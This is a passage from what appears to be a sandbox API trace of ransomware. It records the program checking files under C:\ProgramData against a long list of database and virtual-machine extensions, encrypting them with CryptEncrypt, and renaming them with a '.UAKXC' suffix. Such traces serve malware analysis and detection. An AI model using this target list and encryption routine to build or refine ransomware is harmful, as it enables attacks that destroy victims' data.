Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.956] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.956] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.956] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.956] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0140.956] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.956] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.956] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.956] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.956] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.956] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.956] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.956] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.024] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.024] SetEndOfFile (hFile=0x6c8) returned 1 [0141.024] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.024] ReadFile (in: hFile=0x6c8, lpBuffer=0x4610000, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x146, lpOverlapped=0x0) returned 1 [0141.024] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.024] WriteFile (in: hFile=0x6c8, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x146, lpOverlapped=0x0) returned 1 [0141.024] CloseHandle (hObject=0x6c8) returned 1 [0141.031] GetProcessHeap () returned 0xea0000 [0141.031] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef44d8 [0141.032] lstrcpyW (in: lpString1=0xef44d8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" [0141.032] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.UAKXC" [0141.032] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn.uakxc")) returned 1 [0141.236] GetProcessHeap () returned 0xea0000 [0141.236] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef44d8 | out: hHeap=0xea0000) returned 1 [0141.236] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeba8 | out: hHeap=0xea0000) returned 1 [0141.236] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2538 | out: hHeap=0xea0000) returned 1 [0141.236] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0141.236] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0141.236] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0141.237] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn")) returned 0x2022 [0141.237] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0141.237] GetLastError () returned 0x0 [0141.237] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=350) returned 1 [0141.237] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.237] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.237] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.237] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.237] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.237] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.238] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.239] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.240] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.241] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.242] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.243] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.244] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft 